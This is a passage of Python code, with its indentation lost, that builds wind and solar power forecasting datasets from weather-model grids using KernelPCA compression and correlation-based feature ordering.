kpca = KernelPCA(n_components=components, fit_inverse_transform=True, n_jobs=self.njobs)
grid_search = GridSearchCV(kpca, param_grid, cv=3, scoring=my_scorer, n_jobs=self.njobs)
grid_search.fit(data_scaled)
kpca = grid_search.best_estimator_
fname = os.path.join(self.path_data, 'kpca_' + level + '.pickle')
joblib.dump({'scaler':scaler, 'kpca':kpca}, fname)
def PCA_transform(self, data, components, level):
fname = os.path.join(self.path_data, 'kpca_' + level + '.pickle')
if not os.path.exists(fname):
self.train_PCA(data, components, level)
models = joblib.load(fname)
data_scaled = models['scaler'].transform(data)
data_compress = models['kpca'].transform(data_scaled)
return data_compress
def make_dataset_res(self):
if self.isfortest:
if not os.path.exists(os.path.join(self.path_data, 'nwps_3d_test.pickle')) or not os.path.exists(os.path.join(self.path_data, 'dataset_cnn_test.pickle')):
data, X_3d = self.get_3d_dataset()
else:
data = joblib.load(os.path.join(self.path_data, 'nwps_3d_test.pickle'))
X_3d = joblib.load(os.path.join(self.path_data, 'dataset_cnn_test.pickle'))
else:
if not os.path.exists(os.path.join(self.path_data, 'nwps_3d.pickle')) or not os.path.exists(os.path.join(self.path_data, 'dataset_cnn.pickle')):
data, X_3d = self.get_3d_dataset()
else:
data = joblib.load(os.path.join(self.path_data, 'nwps_3d.pickle'))
X_3d = joblib.load(os.path.join(self.path_data, 'dataset_cnn.pickle'))
data_path = self.path_data
if not isinstance(self.areas, dict):
self.dataset_for_single_farm(data, data_path)
else:
dates_stack = []
for t in self.dates:
pdates = pd.date_range(t + pd.DateOffset(hours=25), t + pd.DateOffset(hours=48), freq='H')
dates = [dt.strftime('%d%m%y%H%M') for dt in pdates if dt in self.data.index]
dates_stack.append(dates)
flag = False
for i, pdates in enumerate(dates_stack):
t= self.dates[i]
fname = os.path.join(self.path_nwp_project, self.nwp_model + '_' + t.strftime('%d%m%y') + '.pickle')
if os.path.exists(fname):
nwps = joblib.load(fname)
for date in pdates:
try:
nwp = nwps[date]
if len(nwp['lat'].shape) == 1:
nwp['lat'] = nwp['lat'][:, np.newaxis]
if len(nwp['long'].shape) == 1:
nwp['long'] = nwp['long'][np.newaxis, :]
lats = (np.where((nwp['lat'][:, 0] >= self.area_group[0][0]) & (nwp['lat'][:, 0] <= self.area_group[1][0])))[0]
longs = (np.where((nwp['long'][0, :] >= self.area_group[0][1]) & (nwp['long'][0, :] <= self.area_group[1][1])))[0]
lats_group = nwp['lat'][lats]
longs_group = nwp['long'][:, longs]
flag = True
break
except:
continue
if flag:
break
self.dataset_for_multiple_farms(data, self.areas, lats_group, longs_group)
def dataset_for_single_farm(self, data, data_path):
dataset_X = pd.DataFrame()
if self.static_data['type'] == 'pv':
hours = [dt.hour for dt in data['dates']]
months = [dt.month for dt in data['dates']]
dataset_X = pd.concat(
[dataset_X, pd.DataFrame(np.stack([hours, months]).T, index=data['dates'], columns=['hour', 'month'])])
for var in self.variables:
if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
X0 = np.transpose(data[var + '_prev'],[0, 2, 1])
X0_level0 = X0[:, 2, 2]
X1 = np.transpose(data[var],[0, 2, 1])
X1_level1 = X1[:, 2, 2]
ind = [[1, j] for j in range(1, 4)] + [[i, 1] for i in range(2, 4)]
ind = np.array(ind)
X1_level3d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_mid_down'
self.logger.info('Begin PCA training for %s', level)
X1_level3d = self.PCA_transform(X1_level3d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[2, 3], [3, 2], [3, 3]]
ind = np.array(ind)
X1_level3u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_mid_up'
self.logger.info('Begin PCA training for %s', level)
X1_level3u = self.PCA_transform(X1_level3u, 2, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[0, j] for j in range(5)] + [[i, 0] for i in range(1, 5)]
ind = np.array(ind)
X1_level4d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_out_down'
self.logger.info('Begin PCA training for %s', level)
X1_level4d = self.PCA_transform(X1_level4d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[4, j] for j in range(1, 5)] + [[i, 4] for i in range(1, 4)]
ind = np.array(ind)
X1_level4u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_out_up'
self.logger.info('Begin PCA training for %s', level)
X1_level4u = self.PCA_transform(X1_level4u, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
X2 = np.transpose(data[var + '_next'],[0, 2, 1])
X2_level0 = X2[:, 2, 2]
var_name = 'flux' if var=='Flux' else 'wind'
var_sort = 'fl' if var=='Flux' else 'ws'
col = ['p_' + var_name] + ['n_' + var_name] + [var_name]
col = col + [var_sort + '_l1.' + str(i) for i in range(3)] + [var_sort + '_l2.' + str(i) for i in
range(2)]
col = col + [var_sort + '_l3d.' + str(i) for i in range(3)] + [var_sort + '_l3u.' + str(i) for i in
range(3)]
X = np.hstack((X0_level0.reshape(-1, 1), X2_level0.reshape(-1, 1), X1_level1.reshape(-1, 1), X1_level3d, X1_level3u, X1_level4d
, X1_level4u))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif var in {'WD', 'Cloud'}:
X1 = np.transpose(data[var],[0, 2, 1])
X1_level1 = X1[:, 2, 2]
ind = [[1, j] for j in range(1, 4)] + [[i, 1] for i in range(2, 4)]
ind = np.array(ind)
X1_level3d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_mid_down'
self.logger.info('Begin PCA training for %s', level)
X1_level3d = self.PCA_transform(X1_level3d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[2, 3], [3, 2], [3, 3]]
ind = np.array(ind)
X1_level3u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_mid_up'
self.logger.info('Begin PCA training for %s', level)
X1_level3u = self.PCA_transform(X1_level3u, 2, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[0, j] for j in range(5)] + [[i, 0] for i in range(1, 5)]
ind = np.array(ind)
X1_level4d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_out_down'
self.logger.info('Begin PCA training for %s', level)
X1_level4d = self.PCA_transform(X1_level4d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[4, j] for j in range(1, 5)] + [[i, 4] for i in range(1, 4)]
ind = np.array(ind)
X1_level4u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_out_up'
self.logger.info('Begin PCA training for %s', level)
X1_level4u = self.PCA_transform(X1_level4u, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'cloud' if var=='Cloud' else 'direction'
var_sort = 'cl' if var=='Cloud' else 'wd'
col = [var_name] + [var_sort + '_l1.' + str(i) for i in range(3)] + [var_sort + '_l2.' + str(i) for i in
range(2)]
col = col + [var_sort + '_l3d.' + str(i) for i in range(3)] + [var_sort + '_l3u.' + str(i) for i in
range(3)]
X = np.hstack((X1_level1.reshape(-1, 1), X1_level3d, X1_level3u, X1_level4d
, X1_level4u))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type']=='pv')):
X2 = np.transpose(data[var],[0, 2, 1])
X2_level0 = X2[:, 2, 2]
var_name = 'Temp' if var == 'Temperature' else 'wind'
var_sort = 'tp' if var == 'Temperature' else 'ws'
col = [var_name]
X = X2_level0
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
else:
continue
dataset_X = dataset_X
dataset_y = self.data.loc[dataset_X.index].to_frame()
dataset_y.columns = ['target']
if self.isfortest:
ind = joblib.load(os.path.join(data_path, 'dataset_columns_order.pickle'))
columns = dataset_X.columns[ind]
dataset_X = dataset_X[columns]
dataset_X.to_csv(os.path.join(self.path_data, 'dataset_X_test.csv'))
dataset_y.to_csv(os.path.join(self.path_data, 'dataset_y_test.csv'))
self.logger.info('Successfully dataset created for Evaluation for %s', self.project_name)
else:
corr = []
for f in range(dataset_X.shape[1]):
corr.append(np.abs(np.corrcoef(dataset_X.values[:, f], dataset_y.values.ravel())[1, 0]))
ind = np.argsort(np.array(corr))[::-1]
columns = dataset_X.columns[ind]
dataset_X = dataset_X[columns]
joblib.dump(ind, os.path.join(data_path, 'dataset_columns_order.pickle'))
dataset_X.to_csv(os.path.join(self.path_data, 'dataset_X.csv'))
dataset_y.to_csv(os.path.join(self.path_data, 'dataset_y.csv'))
self.logger.info('Successfully dataset created for training for %s', self.project_name)
def dataset_for_multiple_farms(self, data, areas, lats_group, longs_group):
dataset_X = pd.DataFrame()
if self.static_data['type'] == 'pv':
hours = [dt.hour for dt in data['dates']]
months = [dt.month for dt in data['dates']]
dataset_X = pd.concat([dataset_X, pd.DataFrame(np.stack([hours, months]).T, index=data['dates'], columns=['hour','month'])])
for var in self.variables:
for area_name, area in areas.items():
if len(area)>1:
lats = (np.where((lats_group[:, 0] >= area[0, 0]) & (lats_group[:, 0] <= area[1, 0])))[0]
longs = (np.where((longs_group[0, :] >= area[0, 1]) & (longs_group[0, :] <= area[1, 1])))[0]
else:
lats = (np.where((lats_group[:, 0] >= area[0]) & (lats_group[:, 0] <= area[2])))[0]
longs = (np.where((longs_group[0, :] >= area[1]) & (longs_group[0, :] <= area[3])))[0]
if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
X0 = data[var + '_prev'][:, lats, :][:, :, longs]
X0 = X0.reshape(-1, X0.shape[1] * X0.shape[2])
level = var + '_prev_' + area_name
self.logger.info('Begin PCA training for %s', level)
X0_compressed = self.PCA_transform(X0, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 9, level)
self.logger.info('Successfully PCA transform for %s', level)
X2 = data[var + '_next'][:, lats, :][:, :, longs]
X2 = X2.reshape(-1, X2.shape[1] * X2.shape[2])
level = var + '_next_' + area_name
self.logger.info('Begin PCA training for %s', level)
X2_compressed = self.PCA_transform(X2, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'flux_' + area_name if var=='Flux' else 'wind_' + area_name
var_sort = 'fl_' + area_name if var=='Flux' else 'ws_' + area_name
col = ['p_' + var_name + '.' + str(i) for i in range(3)]
col += ['n_' + var_name + '.' + str(i) for i in range(3)]
col += [var_name + '.' + str(i) for i in range(9)]
X = np.hstack((X0_compressed, X2_compressed, X1_compressed))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif var in {'WD', 'Cloud'}:
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 9, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'cloud_' + area_name if var=='Cloud' else 'direction_' + area_name
var_sort = 'cl_' + area_name if var=='Cloud' else 'wd_' + area_name
col = [var_name + '.' + str(i) for i in range(9)]
X = X1_compressed
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type']=='pv')):
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'Temp_' + area_name if var == 'Temperature' else 'wind_' + area_name
var_sort = 'tp_' + area_name if var == 'Temperature' else 'ws_' + area_name
col = [var_name + '.' + str(i) for i in range(3)]
X = X1_compressed
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
else:
continue
for var in self.variables:
if ((var == 'WS') and (self.static_data['type'] == 'wind')) or (
(var == 'Flux') and (self.static_data['type'] == 'pv')):
col = []
col_p = []
col_n = []
for area_name, area in areas.items():
var_name = 'flux_' + area_name if var == 'Flux' else 'wind_' + area_name
col += [var_name + '.' + str(i) for i in range(9)]
col_p += ['p_' + var_name + '.' + str(i) for i in range(3)]
col_n += ['n_' + var_name + '.' + str(i) for i in range(3)]
var_name = 'flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
var_name = 'p_flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col_p].mean(axis=1)
var_name = 'n_flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col_n].mean(axis=1)
elif var in {'WD', 'Cloud'}:
col = []
for area_name, area in areas.items():
var_name = 'cloud_' + area_name if var == 'Cloud' else 'direction_' + area_name
col += [var_name + '.' + str(i) for i in range(9)]
var_name = 'cloud' if var == 'Cloud' else 'direction'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type'] == 'pv')):
col = []
for area_name, area in areas.items():
var_name = 'Temp_' + area_name if var == 'Temperature' else 'wind_' + area_name
col += [var_name + '.' + str(i) for i in range(3)]
var_name = 'Temp' if var == 'Temperature' else 'wind'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
dataset_y = self.data.loc[dataset_X.index].to_frame()
dataset_y.columns = ['target']
if self.isfortest:
ind = joblib.load(os.path.join(self.path_data, 'dataset_columns_order.pickle'))
columns = dataset_X.columns[ind]
dataset_X = dataset_X[columns]
dataset_X.to_csv(os.path.join(self.path_data, 'dataset_X_test.csv'))
dataset_y.to_csv(os.path.join(self.path_data, 'dataset_y_test.csv'))
self.logger.info('Successfully dataset created for Evaluation for %s', self.project_name)
else:
corr = []
for f in range(dataset_X.shape[1]):
corr.append(np.abs(np.corrcoef(dataset_X.values[:, f], dataset_y.values.ravel())[1, 0]))
ind = np.argsort(np.array(corr))[::-1]
columns = dataset_X.columns[ind]
dataset_X = dataset_X[columns]
joblib.dump(ind, os.path.join(self.path_data, 'dataset_columns_order.pickle'))
dataset_X.to_csv(os.path.join(self.path_data, 'dataset_X.csv'))
dataset_y.to_csv(os.path.join(self.path_data, 'dataset_y.csv'))
self.logger.info('Successfully dataset created for training for %s', self.project_name)
def make_dataset_res_offline(self, utc=False):
def datetime_exists_in_tz(dt, tz):
try:
dt.tz_localize(tz)
return True
except:
return False
data, X_3d = self.get_3d_dataset_offline(utc)
if not isinstance(self.areas, dict):
X = self.dataset_for_single_farm_offline(data)
else:
dates_stack = []
for t in self.dates:
pdates = pd.date_range(t + pd.DateOffset(hours=24), t + pd.DateOffset(hours=47), freq='H')
dates = [dt.strftime('%d%m%y%H%M') for dt in pdates]
dates_stack.append(dates)
flag = False
for i, pdates in enumerate(dates_stack):
t= self.dates[i]
fname = os.path.join(self.path_nwp_project, self.nwp_model + '_' + t.strftime('%d%m%y') + '.pickle')
if os.path.exists(fname):
nwps = joblib.load(fname)
for date in pdates:
try:
nwp = nwps[date]
if len(nwp['lat'].shape) == 1:
nwp['lat'] = nwp['lat'][:, np.newaxis]
if len(nwp['long'].shape) == 1:
nwp['long'] = nwp['long'][np.newaxis, :]
lats = (np.where((nwp['lat'][:, 0] >= self.area_group[0][0]) & (nwp['lat'][:, 0] <= self.area_group[1][0])))[0]
longs = (np.where((nwp['long'][0, :] >= self.area_group[0][1]) & (nwp['long'][0, :] <= self.area_group[1][1])))[0]
lats_group = nwp['lat'][lats]
longs_group = nwp['long'][:, longs]
flag = True
break
except:
continue
if flag:
break
X = self.dataset_for_multiple_farms_offline(data, self.areas, lats_group, longs_group)
return X, X_3d
def get_3d_dataset_offline(self, utc):
def datetime_exists_in_tz(dt, tz):
try:
dt.tz_localize(tz)
return True
except:
return False
dates_stack = []
for dt in self.dates:
if utc:
pdates = pd.date_range(dt + pd.DateOffset(hours=25), dt + pd.DateOffset(hours=48), freq='H')
dates = [t.strftime('%d%m%y%H%M') for t in pdates]
dates_stack.append(dates)
else:
pdates = pd.date_range(dt + pd.DateOffset(hours=25), dt + pd.DateOffset(hours=48), freq='H')
indices = [i for i, t in enumerate(pdates) if datetime_exists_in_tz(t, tz=timezone('Europe/Athens'))]
pdates = pdates[indices]
pdates = pdates.tz_localize(timezone('Europe/Athens'))
pdates = pdates.tz_convert(timezone('UTC'))
dates = [dt.strftime('%d%m%y%H%M') for dt in pdates]
dates_stack.append(dates)
if not isinstance(self.areas, dict):
nwp = stack_daily_nwps(self.dates[0], dates_stack[0], self.path_nwp_project, self.nwp_model, self.areas,
self.variables, self.compress, self.static_data['type'])
nwp_daily = Parallel(n_jobs=self.njobs)(
delayed(stack_daily_nwps)(self.dates[i], pdates, self.path_nwp_project, self.nwp_model,
self.areas, self.variables, self.compress, self.static_data['type'])
for i, pdates in enumerate(dates_stack))
else:
nwp = stack_daily_nwps(self.dates[0], dates_stack[0], self.path_nwp_project, self.nwp_model,
self.area_group,
self.variables, self.compress, self.static_data['type'])
nwp_daily = Parallel(n_jobs=self.njobs)(
delayed(stack_daily_nwps)(self.dates[i], pdates, self.path_nwp_project, self.nwp_model,
self.area_group, self.variables, self.compress, self.static_data['type'])
for i, pdates in enumerate(dates_stack))
X = np.array([])
data_var = dict()
for var in self.variables:
if ((var == 'WS') and (self.static_data['type'] == 'wind')) or (
(var == 'Flux') and (self.static_data['type'] == 'pv')):
data_var[var + '_prev'] = X
data_var[var] = X
data_var[var + '_next'] = X
else:
data_var[var] = X
data_var['dates'] = X
X_3d = np.array([])
for arrays in nwp_daily:
nwp = arrays[0]
x_2d = arrays[1]
if x_2d.shape[0] != 0:
for var in nwp.keys():
if var != 'dates':
data_var[var] = stack_3d(data_var[var], nwp[var])
else:
data_var[var] = np.hstack((data_var[var], nwp[var]))
X_3d = stack_3d(X_3d, x_2d)
self.logger.info('NWP data stacked for date %s', arrays[2])
return data_var, X_3d
def dataset_for_single_farm_offline(self, data):
dataset_X = pd.DataFrame()
if self.static_data['type'] == 'pv':
hours = [dt.hour for dt in data['dates']]
months = [dt.month for dt in data['dates']]
dataset_X = pd.concat(
[dataset_X, pd.DataFrame(np.stack([hours, months]).T, index=data['dates'], columns=['hour', 'month'])])
for var in self.variables:
if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
X0 = np.transpose(data[var + '_prev'],[0, 2, 1])
X0_level0 = X0[:, 2, 2]
X1 = np.transpose(data[var],[0, 2, 1])
X1_level1 = X1[:, 2, 2]
ind = [[1, j] for j in range(1, 4)] + [[i, 1] for i in range(2, 4)]
ind = np.array(ind)
X1_level3d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_mid_down'
self.logger.info('Begin PCA training for %s', level)
X1_level3d = self.PCA_transform(X1_level3d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[2, 3], [3, 2], [3, 3]]
ind = np.array(ind)
X1_level3u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_mid_up'
self.logger.info('Begin PCA training for %s', level)
X1_level3u = self.PCA_transform(X1_level3u, 2, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[0, j] for j in range(5)] + [[i, 0] for i in range(1, 5)]
ind = np.array(ind)
X1_level4d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_out_down'
self.logger.info('Begin PCA training for %s', level)
X1_level4d = self.PCA_transform(X1_level4d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[4, j] for j in range(1, 5)] + [[i, 4] for i in range(1, 4)]
ind = np.array(ind)
X1_level4u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_out_up'
self.logger.info('Begin PCA training for %s', level)
X1_level4u = self.PCA_transform(X1_level4u, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
X2 = np.transpose(data[var + '_next'],[0, 2, 1])
X2_level0 = X2[:, 2, 2]
var_name = 'flux' if var=='Flux' else 'wind'
var_sort = 'fl' if var=='Flux' else 'ws'
col = ['p_' + var_name] + ['n_' + var_name] + [var_name]
col = col + [var_sort + '_l1.' + str(i) for i in range(3)] + [var_sort + '_l2.' + str(i) for i in
range(2)]
col = col + [var_sort + '_l3d.' + str(i) for i in range(3)] + [var_sort + '_l3u.' + str(i) for i in
range(3)]
X = np.hstack((X0_level0.reshape(-1, 1), X2_level0.reshape(-1, 1), X1_level1.reshape(-1, 1), X1_level3d, X1_level3u, X1_level4d
, X1_level4u))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif var in {'WD', 'Cloud'}:
X1 = np.transpose(data[var],[0, 2, 1])
X1_level1 = X1[:, 2, 2]
ind = [[1, j] for j in range(1, 4)] + [[i, 1] for i in range(2, 4)]
ind = np.array(ind)
X1_level3d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_mid_down'
self.logger.info('Begin PCA training for %s', level)
X1_level3d = self.PCA_transform(X1_level3d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[2, 3], [3, 2], [3, 3]]
ind = np.array(ind)
X1_level3u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_mid_up'
self.logger.info('Begin PCA training for %s', level)
X1_level3u = self.PCA_transform(X1_level3u, 2, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[0, j] for j in range(5)] + [[i, 0] for i in range(1, 5)]
ind = np.array(ind)
X1_level4d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_out_down'
self.logger.info('Begin PCA training for %s', level)
X1_level4d = self.PCA_transform(X1_level4d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[4, j] for j in range(1, 5)] + [[i, 4] for i in range(1, 4)]
ind = np.array(ind)
X1_level4u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_out_up'
self.logger.info('Begin PCA training for %s', level)
X1_level4u = self.PCA_transform(X1_level4u, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'cloud' if var=='Cloud' else 'direction'
var_sort = 'cl' if var=='Cloud' else 'wd'
col = [var_name] + [var_sort + '_l1.' + str(i) for i in range(3)] + [var_sort + '_l2.' + str(i) for i in
range(2)]
col = col + [var_sort + '_l3d.' + str(i) for i in range(3)] + [var_sort + '_l3u.' + str(i) for i in
range(3)]
X = np.hstack((X1_level1.reshape(-1, 1), X1_level3d, X1_level3u, X1_level4d
, X1_level4u))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type']=='pv')):
X2 = np.transpose(data[var],[0, 2, 1])
X2_level0 = X2[:, 2, 2]
var_name = 'Temp' if var == 'Temperature' else 'wind'
var_sort = 'tp' if var == 'Temperature' else 'ws'
col = [var_name]
X = X2_level0
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
else:
continue
return dataset_X
def dataset_for_multiple_farms_offline(self, data, areas, lats_group, longs_group):
dataset_X = pd.DataFrame()
if self.static_data['type'] == 'pv':
hours = [dt.hour for dt in data['dates']]
months = [dt.month for dt in data['dates']]
dataset_X = pd.concat([dataset_X, pd.DataFrame(np.stack([hours, months]).T, index=data['dates'], columns=['hour','month'])])
for var in self.variables:
for area_name, area in areas.items():
if len(area) > 1:
lats = (np.where((lats_group[:, 0] >= area[0, 0]) & (lats_group[:, 0] <= area[1, 0])))[0]
longs = (np.where((longs_group[0, :] >= area[0, 1]) & (longs_group[0, :] <= area[1, 1])))[0]
else:
lats = (np.where((lats_group[:, 0] >= area[0]) & (lats_group[:, 0] <= area[2])))[0]
longs = (np.where((longs_group[0, :] >= area[1]) & (longs_group[0, :] <= area[3])))[0]
if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
X0 = data[var + '_prev'][:, lats, :][:, :, longs]
X0 = X0.reshape(-1, X0.shape[1] * X0.shape[2])
level = var + '_prev_' + area_name
self.logger.info('Begin PCA training for %s', level)
X0_compressed = self.PCA_transform(X0, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 9, level)
self.logger.info('Successfully PCA transform for %s', level)
X2 = data[var + '_next'][:, lats, :][:, :, longs]
X2 = X2.reshape(-1, X2.shape[1] * X2.shape[2])
level = var + '_next_' + area_name
self.logger.info('Begin PCA training for %s', level)
X2_compressed = self.PCA_transform(X2, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'flux_' + area_name if var=='Flux' else 'wind_' + area_name
var_sort = 'fl_' + area_name if var=='Flux' else 'ws_' + area_name
col = ['p_' + var_name + '.' + str(i) for i in range(3)]
col += ['n_' + var_name + '.' + str(i) for i in range(3)]
col += [var_name + '.' + str(i) for i in range(9)]
X = np.hstack((X0_compressed, X2_compressed, X1_compressed))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif var in {'WD', 'Cloud'}:
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 9, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'cloud_' + area_name if var=='Cloud' else 'direction_' + area_name
var_sort = 'cl_' + area_name if var=='Cloud' else 'wd_' + area_name
col = [var_name + '.' + str(i) for i in range(9)]
X = X1_compressed
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type']=='pv')):
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'Temp_' + area_name if var == 'Temperature' else 'wind_' + area_name
var_sort = 'tp_' + area_name if var == 'Temperature' else 'ws_' + area_name
col = [var_name + '.' + str(i) for i in range(3)]
X = X1_compressed
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
else:
continue
for var in self.variables:
if ((var == 'WS') and (self.static_data['type'] == 'wind')) or (
(var == 'Flux') and (self.static_data['type'] == 'pv')):
col = []
col_p = []
col_n = []
for area_name, area in areas.items():
var_name = 'flux_' + area_name if var == 'Flux' else 'wind_' + area_name
col += [var_name + '.' + str(i) for i in range(9)]
col_p += ['p_' + var_name + '.' + str(i) for i in range(3)]
col_n += ['n_' + var_name + '.' + str(i) for i in range(3)]
var_name = 'flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
var_name = 'p_flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col_p].mean(axis=1)
var_name = 'n_flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col_n].mean(axis=1)
elif var in {'WD', 'Cloud'}:
col = []
for area_name, area in areas.items():
var_name = 'cloud_' + area_name if var == 'Cloud' else 'direction_' + area_name
col += [var_name + '.' + str(i) for i in range(9)]
var_name = 'cloud' if var == 'Cloud' else 'direction'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type'] == 'pv')):
col = []
for area_name, area in areas.items():
var_name = 'Temp_' + area_name if var == 'Temperature' else 'wind_' + area_name
col += [var_name + '.' + str(i) for i in range(3)]
var_name = 'Temp' if var == 'Temperature' else 'wind'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
return dataset_X
def make_dataset_res_online(self, utc=False):
def datetime_exists_in_tz(dt, tz):
try:
dt.tz_localize(tz)
return True
except:
return False
data, X_3d = self.get_3d_dataset_online(utc)
if not isinstance(self.areas, dict):
X = self.dataset_for_single_farm_online(data)
else:
dates_stack = []
for t in self.dates:
pdates = pd.date_range(t + pd.DateOffset(hours=24), t + pd.DateOffset(hours=47), freq='H')
dates = [dt.strftime('%d%m%y%H%M') for dt in pdates]
dates_stack.append(dates)
flag = False
for i, pdates in enumerate(dates_stack):
t= self.dates[i]
fname = os.path.join(self.path_nwp_project, self.nwp_model + '_' + t.strftime('%d%m%y') + '.pickle')
if os.path.exists(fname):
nwps = joblib.load(fname)
for date in pdates:
try:
nwp = nwps[date]
if len(nwp['lat'].shape) == 1:
nwp['lat'] = nwp['lat'][:, np.newaxis]
if len(nwp['long'].shape) == 1:
nwp['long'] = nwp['long'][np.newaxis, :]
lats = (np.where((nwp['lat'][:, 0] >= self.area_group[0][0]) & (nwp['lat'][:, 0] <= self.area_group[1][0])))[0]
longs = (np.where((nwp['long'][0, :] >= self.area_group[0][1]) & (nwp['long'][0, :] <= self.area_group[1][1])))[0]
